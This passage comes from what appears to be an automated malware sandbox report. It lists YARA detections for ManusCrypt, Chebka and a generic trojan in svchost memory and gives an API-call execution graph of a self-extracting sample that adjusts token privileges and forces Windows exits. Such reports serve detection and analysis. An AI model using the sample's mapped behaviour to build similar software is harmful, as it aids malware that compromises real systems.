                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.47268428455.000001980BB00000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000003.43128837241.000001980BB03000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000003.42946894366.000001980989B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.47256793876.0000019809780000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000026.00000002.47256793876.0000019809780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000026.00000002.47256793876.0000019809780000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.47262482230.00000198098A4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                    Start time:07:10:25
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                    Imagebase:0x7ff6e5440000
                                                                                                                                                                                                                                    File size:57360 bytes
                                                                                                                                                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000028.00000003.42858002035.000001F19B2C0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000028.00000003.42858002035.000001F19B2C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000028.00000003.42858002035.000001F19B2C0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                    Start time:07:10:25
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\VSSVC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                    Imagebase:0x7ff6bdc60000
                                                                                                                                                                                                                                    File size:1477120 bytes
                                                                                                                                                                                                                                    MD5 hash:AA98234C89499A69BD55C2DCCC4BCCC9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                    Start time:07:10:26
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k swprv
                                                                                                                                                                                                                                    Imagebase:0x7ff6e5440000
                                                                                                                                                                                                                                    File size:57360 bytes
                                                                                                                                                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                                    Start time:07:10:26
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 856
                                                                                                                                                                                                                                    Imagebase:0x500000
                                                                                                                                                                                                                                    File size:482640 bytes
                                                                                                                                                                                                                                    MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                                    Start time:07:10:28
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3452 -ip 3452
                                                                                                                                                                                                                                    Imagebase:0x500000
                                                                                                                                                                                                                                    File size:482640 bytes
                                                                                                                                                                                                                                    MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:30.6%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:23.9%
                                                                                                                                                                                                                                      Total number of Nodes:978
                                                                                                                                                                                                                                      Total number of Limit Nodes:47
                                                                                                                                                                                                                                      execution_graph 2199 4069c0 __getmainargs 2200 406a00 2217 407105 2200->2217 2202 406a05 2203 406a16 GetStartupInfoW 2202->2203 2204 406a33 2203->2204 2205 406a48 2204->2205 2206 406a4f Sleep 2204->2206 2207 406a67 _amsg_exit 2205->2207 2209 406a71 2205->2209 2206->2204 2207->2209 2208 406ab3 _initterm 2212 406ace 2208->2212 2209->2208 2210 406a94 2209->2210 2209->2212 2211 406b76 _ismbblead 2211->2212 2212->2211 2214 406bbe 2212->2214 2215 406b5e exit 2212->2215 2222 402bf2 GetVersion 2212->2222 2214->2210 2216 406bc7 _cexit 2214->2216 2215->2212 2216->2210 2218 40712a 2217->2218 2219 40712e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2217->2219 2218->2219 2220 407192 2218->2220 2221 40717d 2219->2221 2220->2202 2221->2220 2223 402c06 2222->2223 2224 402c47 2222->2224 2223->2224 2226 402c0a GetModuleHandleW 2223->2226 2239 402ca1 memset memset memset 2224->2239 2226->2224 2228 402c19 GetProcAddress 2226->2228 2228->2224 2234 402c2b 2228->2234 2229 402c85 2231 402c95 2229->2231 2232 402c8e CloseHandle 2229->2232 2231->2212 2232->2231 2234->2224 2237 402c80 2335 401f9b 2237->2335 2352 404669 FindResourceA SizeofResource 2239->2352 2242 402e27 2244 404495 20 API calls 2242->2244 2243 402d24 CreateEventA SetEvent 2245 404669 7 API calls 2243->2245 2247 402e44 2244->2247 2246 402d4e 2245->2246 2248 402d52 2246->2248 2250 402d81 2246->2250 2251 402e16 2246->2251 2384 406c80 2247->2384 2389 404495 2248->2389 2255 404669 7 API calls 2250->2255 2357 405c50 2251->2357 2253 402d65 2253->2247 2258 402d96 2255->2258 2256 402c59 2256->2229 2281 402f10 2256->2281 2258->2248 2260 402d9a CreateMutexA 2258->2260 2259 402e31 2261 402e49 FindResourceA 2259->2261 2262 402e3a 2259->2262 2260->2251 2263 402db4 GetLastError 2260->2263 2266 402e65 2261->2266 2267 402e5b LoadResource 2261->2267 2418 402395 2262->2418 2263->2251 2265 402dc1 2263->2265 2268 402de1 2265->2268 2269 402dcc 2265->2269 2266->2247 2270 402e82 2266->2270 2267->2266 2272 404495 20 API calls 2268->2272 2271 404495 20 API calls 2269->2271 2432 4036dc GetVersionExA 2270->2432 2275 402ddf 2271->2275 2273 402df6 2272->2273 2273->2251 2276 402dfb CloseHandle 2273->2276 2275->2276 2276->2247 2282 402f32 2281->2282 2283 402f5f 2281->2283 2285 402f52 2282->2285 2557 4051a5 2282->2557 2577 405124 2283->2577 2710 403a2b 2285->2710 2287 402f64 2290 403034 2287->2290 2592 40555a 2287->2592 2294 406c80 4 API calls 2290->2294 2296 402c62 2294->2296 2295 402f79 GetSystemDirectoryA 2297 406534 CharPrevA 2295->2297 2322 405276 2296->2322 2298 402f9e LoadLibraryA 2297->2298 2299 402fb3 GetProcAddress 2298->2299 2300 402fea FreeLibrary 2298->2300 2299->2300 2303 402fc9 DecryptFileA 2299->2303 2301 402ff9 2300->2301 2302 40300a SetCurrentDirectoryA 2300->2302 2301->2302 2642 4061ce GetWindowsDirectoryA 2301->2642 2304 403045 2302->2304 2305 403019 2302->2305 2303->2300 2310 402fe3 2303->2310 2306 403052 2304->2306 2653 403b12 2304->2653 2308 404495 20 API calls 2305->2308 2306->2290 2312 40306b 2306->2312 2662 402570 2306->2662 2314 40302a 2308->2314 2310->2300 2316 403089 2312->2316 2673 403b8e 2312->2673 2729 406233 GetLastError 2314->2729 2316->2290 2319 4030a0 2316->2319 2731 404153 2319->2731 2325 405296 2322->2325 2330 4052d6 2322->2330 2323 40534c 2326 406c80 4 API calls 2323->2326 2324 4052c0 LocalFree LocalFree 2324->2325 2324->2330 2325->2324 2327 4052ab SetFileAttributesA DeleteFileA 2325->2327 2328 402c69 2326->2328 2327->2324 2328->2229 2328->2237 2331 40531e SetCurrentDirectoryA 2330->2331 2332 406592 4 API calls 2330->2332 2334 405334 2330->2334 2333 402395 13 API calls 2331->2333 2332->2331 2333->2334 2334->2323 3065 401fec 2334->3065 2336 401fa5 2335->2336 2337 401faa 2335->2337 2338 401ec1 15 API calls 2336->2338 2339 401fcb 2337->2339 2340 404495 20 API calls 2337->2340 2343 401fe4 2337->2343 2338->2337 2341 401eef GetCurrentProcess OpenProcessToken 2339->2341 2342 401fda ExitWindowsEx 2339->2342 2339->2343 2340->2339 2345 401f30 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2341->2345 2346 401f1b 2341->2346 2342->2343 2343->2229 2345->2346 2347 401f78 ExitWindowsEx 2345->2347 2348 404495 20 API calls 2346->2348 2347->2346 2349 401f2c 2347->2349 2348->2349 2350 406c80 4 API calls 2349->2350 2351 401f99 2350->2351 2351->2229 2353 404690 2352->2353 2354 402d11 2352->2354 2353->2354 2355 404698 FindResourceA LoadResource LockResource 2353->2355 2354->2242 2354->2243 2355->2354 2356 4046b9 memcpy_s FreeResource 2355->2356 2356->2354 2358 4060ad 2357->2358 2382 405c75 2357->2382 2360 406c80 4 API calls 2358->2360 2359 405d82 2359->2358 2363 405d9e GetModuleFileNameA 2359->2363 2362 402e23 2360->2362 2361 405c9f CharNextA 2361->2382 2362->2242 2362->2259 2364 405dc9 2363->2364 2365 405dbc 2363->2365 2364->2358 2475 406670 2365->2475 2367 4061c8 2484 406dc8 2367->2484 2370 405de8 CharUpperA 2371 406182 2370->2371 2370->2382 2372 404495 20 API calls 2371->2372 2373 406199 2372->2373 2374 4061a2 CloseHandle 2373->2374 2375 4061a9 ExitProcess 2373->2375 2374->2375 2376 405f51 CharUpperA 2376->2382 2377 405f0b CompareStringA 2377->2382 2378 405fb5 CharUpperA 2378->2382 2379 406627 IsDBCSLeadByte CharNextA 2379->2382 2380 405e8e CharUpperA 2380->2382 2381 406054 CharUpperA 2381->2382 2382->2358 2382->2359 2382->2361 2382->2367 2382->2370 2382->2376 2382->2377 2382->2378 2382->2379 2382->2380 2382->2381 2480 406534 2382->2480 2385 406c88 2384->2385 2386 406c8b 2384->2386 2385->2256 2491 406c90 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2386->2491 2388 406dc6 2388->2256 2390 404536 2389->2390 2391 4044da LoadStringA 2389->2391 2395 406c80 4 API calls 2390->2395 2392 404503 2391->2392 2393 40453e 2391->2393 2492 4067cb 2392->2492 2398 4045a5 2393->2398 2405 40455a 2393->2405 2396 404665 2395->2396 2396->2253 2401 4045e3 LocalAlloc 2398->2401 2402 4045a9 LocalAlloc 2398->2402 2399 404512 MessageBoxA 2399->2390 2401->2390 2404 4045a0 2401->2404 2402->2390 2409 4045cf 2402->2409 2407 404609 MessageBeep 2404->2407 2405->2405 2408 404572 LocalAlloc 2405->2408 2411 4067cb 10 API calls 2407->2411 2408->2390 2412 40458b 2408->2412 2410 40173e _vsnprintf 2409->2410 2410->2404 2413 404617 2411->2413 2509 40173e 2412->2509 2415 404621 MessageBoxA LocalFree 2413->2415 2416 406777 EnumResourceLanguagesA 2413->2416 2415->2390 2416->2415 2419 4024d0 2418->2419 2422 4023be 2418->2422 2420 406c80 4 API calls 2419->2420 2421 4024e1 2420->2421 2421->2247 2422->2419 2423 4023ee FindFirstFileA 2422->2423 2423->2419 2430 40240c 2423->2430 2424 402426 lstrcmpA 2425 402436 lstrcmpA 2424->2425 2426 4024ae FindNextFileA 2424->2426 2425->2426 2425->2430 2427 4024c2 FindClose RemoveDirectoryA 2426->2427 2426->2430 2427->2419 2428 40248d SetFileAttributesA DeleteFileA 2428->2426 2429 406534 CharPrevA 2429->2430 2430->2424 2430->2426 2430->2428 2430->2429 2431 402395 5 API calls 2430->2431 2431->2430 2437 403725 2432->2437 2439 40371b 2432->2439 2433 404495 20 API calls 2434 4039ea 2433->2434 2435 406c80 4 API calls 2434->2435 2436 402e89 2435->2436 2436->2247 2436->2253 2447 4018c1 2436->2447 2437->2434 2437->2439 2440 403892 2437->2440 2519 4028e3 2437->2519 2439->2433 2439->2434 2440->2434 2440->2439 2441 4039af MessageBeep 2440->2441 2442 4067cb 10 API calls 2441->2442 2443 4039bc 2442->2443 2444 4039c6 MessageBoxA 2443->2444 2446 406777 EnumResourceLanguagesA 2443->2446 2444->2434 2446->2444 2448 4018f3 2447->2448 2449 4019d6 2447->2449 2548 40180e LoadLibraryA 2448->2548 2451 406c80 4 API calls 2449->2451 2453 4019f3 2451->2453 2453->2253 2467 4064c3 FindResourceA 2453->2467 2454 401903 GetCurrentProcess OpenProcessToken 2454->2449 2455 40191e GetTokenInformation 2454->2455 2456 401936 GetLastError 2455->2456 2457 4019c8 CloseHandle 2455->2457 2456->2457 2458 401945 LocalAlloc 2456->2458 2457->2449 2459 401956 GetTokenInformation 2458->2459 2460 4019c7 2458->2460 2461 4019c0 LocalFree 2459->2461 2462 40196c AllocateAndInitializeSid 2459->2462 2460->2457 2461->2460 2462->2461 2465 40198c 2462->2465 2463 4019b7 FreeSid 2463->2461 2464 401993 EqualSid 2464->2465 2466 4019aa 2464->2466 2465->2463 2465->2464 2465->2466 2466->2463 2468 4064e2 LoadResource 2467->2468 2469 406517 2467->2469 2468->2469 2471 4064f0 DialogBoxIndirectParamA FreeResource 2468->2471 2470 404495 20 API calls 2469->2470 2472 406528 2470->2472 2471->2469 2473 40652b 2471->2473 2472->2473 2473->2253 2478 40667d 2475->2478 2476 40669b 2476->2364 2478->2476 2479 40668d CharNextA 2478->2479 2487 4065f2 2478->2487 2479->2478 2481 406545 2480->2481 2481->2481 2482 406562 CharPrevA 2481->2482 2483 406555 2481->2483 2482->2483 2483->2382 2490 406c90 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2484->2490 2486 4061cd 2488 406612 2487->2488 2489 406607 IsDBCSLeadByte 2487->2489 2488->2478 2489->2488 2490->2486 2491->2388 2493 406803 GetVersionExA 2492->2493 2502 4068c6 2492->2502 2496 406828 2493->2496 2493->2502 2494 406c80 4 API calls 2495 404508 2494->2495 2495->2399 2503 406777 2495->2503 2497 406851 GetSystemMetrics 2496->2497 2496->2502 2498 406861 RegOpenKeyExA 2497->2498 2497->2502 2499 406882 RegQueryValueExA RegCloseKey 2498->2499 2498->2502 2500 4068b8 2499->2500 2499->2502 2513 4066a1 2500->2513 2502->2494 2504 406790 2503->2504 2505 4067b1 2503->2505 2517 406743 EnumResourceLanguagesA 2504->2517 2505->2399 2507 4067a3 2507->2505 2518 406743 EnumResourceLanguagesA 2507->2518 2510 40174d 2509->2510 2511 40177d 2510->2511 2512 40175d _vsnprintf 2510->2512 2511->2404 2512->2511 2514 4066b7 2513->2514 2515 4066e8 CharNextA 2514->2515 2516 4066f3 2514->2516 2515->2514 2516->2502 2517->2507 2518->2505 2520 402908 2519->2520 2521 402a5d 2519->2521 2520->2521 2525 402950 GlobalAlloc 2520->2525 2527 402a1b GlobalUnlock 2520->2527 2528 402a79 GlobalUnlock 2520->2528 2529 402770 2520->2529 2522 402a70 2521->2522 2523 402a69 GlobalFree 2521->2523 2522->2440 2523->2522 2525->2521 2526 402963 GlobalLock 2525->2526 2526->2520 2526->2521 2527->2520 2528->2521 2530 4027a0 CharUpperA CharNextA CharNextA 2529->2530 2531 4028af 2529->2531 2532 4028b4 GetSystemDirectoryA 2530->2532 2533 4027d8 2530->2533 2531->2532 2536 4028bc 2532->2536 2534 4027e0 2533->2534 2535 4028a5 GetWindowsDirectoryA 2533->2535 2541 406534 CharPrevA 2534->2541 2535->2536 2537 4028cf 2536->2537 2538 406534 CharPrevA 2536->2538 2539 406c80 4 API calls 2537->2539 2538->2537 2540 4028df 2539->2540 2540->2520 2542 40280d RegOpenKeyExA 2541->2542 2542->2536 2543 402834 RegQueryValueExA 2542->2543 2544 402897 RegCloseKey 2543->2544 2545 402859 2543->2545 2544->2536 2546 402864 ExpandEnvironmentStringsA 2545->2546 2547 402877 2545->2547 2546->2547 2547->2544 2549 4018b0 2548->2549 2550 401846 GetProcAddress 2548->2550 2551 406c80 4 API calls 2549->2551 2552 4018a9 FreeLibrary 2550->2552 2553 401859 AllocateAndInitializeSid 2550->2553 2554 4018bf 2551->2554 2552->2549 2553->2552 2556 40187f FreeSid 2553->2556 2554->2449 2554->2454 2556->2552 2558 404669 7 API calls 2557->2558 2559 4051b9 LocalAlloc 2558->2559 2560 4051ed 2559->2560 2561 4051cd 2559->2561 2563 404669 7 API calls 2560->2563 2562 404495 20 API calls 2561->2562 2564 4051de 2562->2564 2565 4051fa 2563->2565 2566 406233 GetLastError 2564->2566 2567 405222 lstrcmpA 2565->2567 2568 4051fe 2565->2568 2576 4051e3 2566->2576 2570 405232 LocalFree 2567->2570 2571 40523e 2567->2571 2569 404495 20 API calls 2568->2569 2573 40520f LocalFree 2569->2573 2572 402f40 2570->2572 2574 404495 20 API calls 2571->2574 2572->2283 2572->2285 2572->2290 2573->2572 2575 405250 LocalFree 2574->2575 2575->2576 2576->2572 2578 404669 7 API calls 2577->2578 2579 405135 2578->2579 2580 40513a 2579->2580 2581 40516f 2579->2581 2582 404495 20 API calls 2580->2582 2583 404669 7 API calls 2581->2583 2591 40514d 2582->2591 2584 405180 2583->2584 2744 406246 2584->2744 2588 4051a1 2588->2287 2589 40518e 2590 404495 20 API calls 2589->2590 2590->2591 2591->2287 2593 404669 7 API calls 2592->2593 2594 405581 LocalAlloc 2593->2594 2595 405595 2594->2595 2596 4055b7 2594->2596 2597 404495 20 API calls 2595->2597 2598 404669 7 API calls 2596->2598 2599 4055a6 2597->2599 2600 4055c4 2598->2600 2601 406233 GetLastError 2599->2601 2602 4055c8 2600->2602 2603 4055ec lstrcmpA 2600->2603 2604 4055ab 2601->2604 2605 404495 20 API calls 2602->2605 2606 405605 LocalFree 2603->2606 2607 4055ff 2603->2607 2630 4055b0 2604->2630 2608 4055d9 LocalFree 2605->2608 2609 405650 2606->2609 2610 405615 2606->2610 2607->2606 2608->2630 2611 405859 2609->2611 2614 405668 GetTempPathA 2609->2614 2615 405423 49 API calls 2610->2615 2612 4064c3 24 API calls 2611->2612 2612->2630 2613 406c80 4 API calls 2616 402f71 2613->2616 2617 4056a5 2614->2617 2618 40567d 2614->2618 2619 405632 2615->2619 2616->2290 2616->2295 2624 4056d1 GetDriveTypeA 2617->2624 2625 405826 GetWindowsDirectoryA 2617->2625 2617->2630 2756 405423 2618->2756 2621 40563a 2619->2621 2619->2630 2623 404495 20 API calls 2621->2623 2623->2604 2626 4056ea GetFileAttributesA 2624->2626 2640 4056e5 2624->2640 2790 405933 GetCurrentDirectoryA SetCurrentDirectoryA 2625->2790 2626->2640 2630->2613 2631 405933 34 API calls 2631->2640 2632 405423 49 API calls 2632->2617 2633 402631 21 API calls 2633->2640 2635 40577b GetWindowsDirectoryA 2635->2640 2636 406534 CharPrevA 2637 4057a2 GetFileAttributesA 2636->2637 2638 4057b4 CreateDirectoryA 2637->2638 2637->2640 2638->2640 2639 4057e1 SetFileAttributesA 2639->2640 2640->2624 2640->2625 2640->2626 2640->2630 2640->2631 2640->2633 2640->2635 2640->2636 2640->2639 2641 405423 49 API calls 2640->2641 2786 4068fc 2640->2786 2641->2640 2643 406218 2642->2643 2644 4061f9 2642->2644 2646 405933 34 API calls 2643->2646 2645 404495 20 API calls 2644->2645 2647 40620a 2645->2647 2648 406227 2646->2648 2649 406233 GetLastError 2647->2649 2650 406c80 4 API calls 2648->2650 2652 40620f 2649->2652 2651 403006 2650->2651 2651->2290 2651->2302 2652->2648 2654 403b19 2653->2654 2654->2654 2655 403b5e 2654->2655 2656 403b3f 2654->2656 2857 404fa0 2655->2857 2658 4064c3 24 API calls 2656->2658 2659 403b5c 2658->2659 2660 406246 10 API calls 2659->2660 2661 403b67 2659->2661 2660->2661 2661->2306 2663 402625 2662->2663 2664 402586 2662->2664 2911 4024e5 GetWindowsDirectoryA 2663->2911 2666 4025eb RegOpenKeyExA 2664->2666 2669 40258e 2664->2669 2667 40260c RegQueryInfoKeyA 2666->2667 2668 4025e6 2666->2668 2670 4025d4 RegCloseKey 2667->2670 2668->2312 2669->2668 2671 40259e RegOpenKeyExA 2669->2671 2670->2668 2671->2668 2672 4025bf RegQueryValueExA 2671->2672 2672->2670 2674 403bc7 2673->2674 2689 403bd8 2673->2689 2675 404669 7 API calls 2674->2675 2675->2689 2676 403bef memset 2676->2689 2677 403cff 2678 404495 20 API calls 2677->2678 2679 403d12 2678->2679 2681 403f39 2679->2681 2682 406c80 4 API calls 2681->2682 2683 403f4c 2682->2683 2683->2316 2684 403fc3 2684->2681 3010 40226e 2684->3010 2685 403d67 CompareStringA 2685->2684 2685->2689 2688 403f97 2690 404495 20 API calls 2688->2690 2689->2676 2689->2677 2689->2681 2689->2684 2689->2685 2689->2688 2691 404669 7 API calls 2689->2691 2692 403f32 LocalFree 2689->2692 2693 403f0a LocalFree 2689->2693 2697 403cb3 CompareStringA 2689->2697 2707 403dfc 2689->2707 2919 401b04 2689->2919 2959 402033 memset memset RegCreateKeyExA 2689->2959 2985 403fdb 2689->2985 2695 403faa LocalFree 2690->2695 2691->2689 2692->2681 2693->2684 2693->2689 2695->2681 2697->2689 2698 403e0b GetProcAddress 2700 403f50 2698->2700 2698->2707 2699 403f7e 2701 404495 20 API calls 2699->2701 2702 404495 20 API calls 2700->2702 2703 403f95 2701->2703 2704 403f61 FreeLibrary 2702->2704 2705 403f68 LocalFree 2703->2705 2704->2705 2706 406233 GetLastError 2705->2706 2706->2679 2707->2698 2707->2699 2708 403eeb FreeLibrary 2707->2708 2709 403f2c FreeLibrary 2707->2709 3000 406443 2707->3000 2708->2693 2709->2692 2711 404669 7 API calls 2710->2711 2712 403a41 LocalAlloc 2711->2712 2713 403a58 2712->2713 2714 403a7a 2712->2714 2716 404495 20 API calls 2713->2716 2715 404669 7 API calls 2714->2715 2717 403a84 2715->2717 2718 403a69 2716->2718 2719 403ab1 lstrcmpA 2717->2719 2720 403a88 2717->2720 2721 406233 GetLastError 2718->2721 2723 403ac6 2719->2723 2724 403af9 LocalFree 2719->2724 2722 404495 20 API calls 2720->2722 2727 402f57 2721->2727 2725 403a99 LocalFree 2722->2725 2726 4064c3 24 API calls 2723->2726 2724->2727 2725->2727 2728 403ad8 LocalFree 2726->2728 2727->2283 2727->2290 2728->2727 2730 40302f 2729->2730 2730->2290 2732 404669 7 API calls 2731->2732 2733 404167 LocalAlloc 2732->2733 2734 404192 2733->2734 2735 40417f 2733->2735 2737 404669 7 API calls 2734->2737 2736 404495 20 API calls 2735->2736 2738 404190 2736->2738 2739 40419f 2737->2739 2738->2290 2740 4041a3 2739->2740 2741 4041af lstrcmpA 2739->2741 2743 404495 20 API calls 2740->2743 2741->2740 2742 4041d0 LocalFree 2741->2742 2742->2738 2743->2742 2745 40173e _vsnprintf 2744->2745 2746 406277 FindResourceA 2745->2746 2748 406301 2746->2748 2749 406279 LoadResource LockResource 2746->2749 2750 406c80 4 API calls 2748->2750 2749->2748 2752 40628e 2749->2752 2751 40518a 2750->2751 2751->2588 2751->2589 2753 406303 FreeResource 2752->2753 2754 4062c9 FreeResource 2752->2754 2753->2748 2755 40173e _vsnprintf 2754->2755 2755->2746 2757 405446 2756->2757 2758 4054d6 2756->2758 2817 40535f 2757->2817 2828 405880 2758->2828 2760 40553d 2764 406c80 4 API calls 2760->2764 2763 405451 2763->2760 2767 4054c8 2763->2767 2768 40547e GetSystemInfo 2763->2768 2769 405556 2764->2769 2765 4054f7 CreateDirectoryA 2770 405533 2765->2770 2771 405503 2765->2771 2766 405509 2766->2760 2772 405933 34 API calls 2766->2772 2773 406534 CharPrevA 2767->2773 2779 405496 2768->2779 2769->2630 2780 402631 GetWindowsDirectoryA 2769->2780 2774 406233 GetLastError 2770->2774 2771->2766 2775 405518 2772->2775 2773->2758 2776 405538 2774->2776 2775->2760 2778 405524 RemoveDirectoryA 2775->2778 2776->2760 2777 406534 CharPrevA 2777->2767 2778->2760 2779->2767 2779->2777 2781 402670 2780->2781 2782 40265f 2780->2782 2784 406c80 4 API calls 2781->2784 2783 404495 20 API calls 2782->2783 2783->2781 2785 402688 2784->2785 2785->2617 2785->2632 2787 406918 GetDiskFreeSpaceA 2786->2787 2788 40694b 2786->2788 2787->2788 2789 406933 MulDiv 2787->2789 2788->2640 2789->2788 2791 405971 2790->2791 2792 405993 GetDiskFreeSpaceA 2790->2792 2793 404495 20 API calls 2791->2793 2794 405b57 memset 2792->2794 2795 4059d7 MulDiv 2792->2795 2796 405982 2793->2796 2797 406233 GetLastError 2794->2797 2795->2794 2798 405a06 GetVolumeInformationA 2795->2798 2799 406233 GetLastError 2796->2799 2800 405b72 GetLastError FormatMessageA 2797->2800 2801 405a24 memset 2798->2801 2802 405a6b SetCurrentDirectoryA 2798->2802 2803 405987 2799->2803 2804 405b99 2800->2804 2805 406233 GetLastError 2801->2805 2810 405a82 2802->2810 2815 